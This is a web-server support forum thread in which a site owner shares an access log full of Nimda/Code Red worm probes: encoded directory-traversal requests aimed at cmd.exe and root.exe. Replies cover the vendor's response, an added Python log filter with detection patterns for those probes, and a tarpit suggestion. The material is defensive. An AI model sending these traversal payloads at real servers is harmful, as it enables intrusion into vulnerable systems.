POMP
Joined: 04 Apr 2002 Posts: 15 Location: Houston, TX
Posted: Sat Apr 06, 2002 10:34 pm Post subject: Is anyone else getting hammered like this?

When I view my access log, I get repeated break-in attempts by what I can only assume are PCs or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?
Here is a portion of my access.log so you can see what I'm talking about:
66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:27 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:30 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:56 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
aprelium
Joined: 22 Mar 2002 Posts: 6800
Posted: Sun Apr 07, 2002 2:01 am Post subject: Is anyone else getting hammered like this?

POMP wrote:
When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?
Unfortunately, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It always responds with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not to log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials.
_________________
Support Team
Aprelium - http://www.aprelium.com
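Abyss could not suppress these entries at the time, but the log can be cleaned after the fact. The script below is an added example, not code from the thread or from Aprelium: it parses Common Log Format lines, recognises the probe paths seen in POMP's excerpt (root.exe, cmd.exe and the encoded ../ traversal variants) on the still-encoded path, counts probes per source host and keeps only the remaining lines. The sample log lines and their documentation-range addresses are constructed.

```python
import re
from collections import Counter

# One Common Log Format line: host ident user [time] "request" status bytes ...
CLF_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-)')

# Request-path signatures of the Nimda / Code Red II probe set shown in the thread, matched on the
# still-URL-encoded path so the double-encoded and overlong-UTF-8 traversal variants are caught as written.
WORM_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r'/root\.exe',                 # Code Red II's copy of cmd.exe in /scripts and /MSADC
    r'/winnt/system32/cmd\.exe',   # cmd.exe reached through the /c and /d drive mappings
    r'\.\.%255c', r'\.\.%25%35%63', r'\.\.%252f',             # double-encoded \ and /
    r'\.\.%c0%af', r'\.\.%c0%2f', r'\.\.%c1%1c', r'\.\.%c1%9c',  # overlong UTF-8 \ and /
)]

def parse_clf(line):
    """Fields of one CLF line as a dict, or None when the line is not CLF."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None

def is_worm_probe(request):
    """True when the request line's path carries one of the worm probe signatures."""
    parts = request.split(" ")
    path = parts[1] if len(parts) >= 2 else request
    return any(p.search(path) for p in WORM_PATTERNS)

def split_log(lines):
    """Drop worm probes from the log; return (kept_lines, probe_count_by_host)."""
    kept, hosts = [], Counter()
    for line in lines:
        fields = parse_clf(line)
        if fields and is_worm_probe(fields["request"]):
            hosts[fields["host"]] += 1
        else:
            kept.append(line)  # legitimate traffic and anything unparseable stays in the log
    return kept, hosts

# Constructed sample in the shape of the thread's excerpt (192.0.2.x / 198.51.100.x are documentation ranges).
SAMPLE = [
    '192.0.2.10 - - [06/Apr/2002:07:55:35 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""',
    '192.0.2.10 - - [06/Apr/2002:07:55:36 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""',
    '192.0.2.10 - - [06/Apr/2002:07:55:36 +0000] "GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""',
    '198.51.100.7 - - [06/Apr/2002:08:00:01 +0000] "GET /index.html HTTP/1.1" 200 1532 "" "Mozilla/4.0"',
]

if __name__ == "__main__":
    kept, probes = split_log(SAMPLE)
    for host, n in probes.most_common():
        print(f"{host}: {n} worm probes dropped")
    print("\n".join(kept))
```

Run it over a real access.log by replacing SAMPLE with the file's lines; the per-host counts are what you would feed a firewall rule or an abuse report, while the kept lines are the traffic worth reading.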
decrepidloser
Joined: 24 Oct 2002 Posts: 2
Posted: Thu Oct 24, 2002 11:33 pm Post subject: Re: Is anyone else getting hammered like this?

aprelium wrote:
POMP wrote:
When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?

Unfortunately, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It always responds with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not to log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials.

Well, is there a way to redirect the requested URLs or files to another site? i.e. www.microsoft.com, so maybe they will fix their broken server.
aprelium
Joined: 22 Mar 2002 Posts: 6800
Posted: Fri Oct 25, 2002 11:31 am Post subject: Re: Is anyone else getting hammered like this?

decrepidloser wrote:
Well, is there a way to redirect the requested URLs or files to another site? i.e. www.microsoft.com, so maybe they will fix their broken server.

This is an idea we can consider :wink:
But, in order to solve this problem, we will provide Abyss Web Server (in a future version) with a mechanism that stops logging such requests (and of course, it will continue to deny them as it already does).
_________________
Support Team
Aprelium - http://www.aprelium.com
aharcup
Joined: 28 Feb 2003 Posts: 1
Posted: Fri Feb 28, 2003 2:52 pm Post subject: Check out LaBrea

LaBrea can really tie up the resources of the infected NIMDA server.
Check out http://www.hackbusters.net/LaBrea/ to find out more.
I have used this piece of code and it rocks.
Andy
:D